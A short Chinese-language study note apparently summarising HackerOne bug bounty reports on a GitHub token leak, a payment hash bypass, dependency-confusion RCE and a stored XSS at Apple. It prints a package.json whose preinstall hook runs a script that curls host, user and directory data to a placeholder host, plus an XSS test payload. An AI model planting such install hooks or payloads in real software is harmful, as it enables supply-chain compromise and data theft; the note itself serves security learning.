渗透测试(Hackerone)

总结Hackerone帖子,学习并积累思路。

1. Shopify's Github access token exposure:Github的oauth账户泄漏
1. Modify in-flight data to payment provider Smart2Pay :利用邮箱作为输入,绕过hash验证
1. Mail.r's RCE in CI/CD via dependency confusion:"dependency confusion" bug,代码在 CI/CD 管道执行期间在生产服务器上执行。

#package.json
{
  "name": "vulnerable-dependency",
  "version": "99.99.99",
  "description": "act1on3",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "preinstall": "./pre.sh"
  },
  "author": "",
  "license": "ISC"
}

# pre.sh
#!/bin/bash
curl -H "Hostname: $(hostname | base64)" -H "Whoami: $(whoami | base64)" -H "Pwd: $(pwd | base64)" -d $(ls -la | base64)  http://receiver

1. How I found a bug in Apple within just in 5min. | by Akash basnet | Pentester Nepal | Jul, 2021 | Medium:简单的存储型XSS,xss payload

'''><svg/onlod=prompt(document.dmoain);>{{7*7}}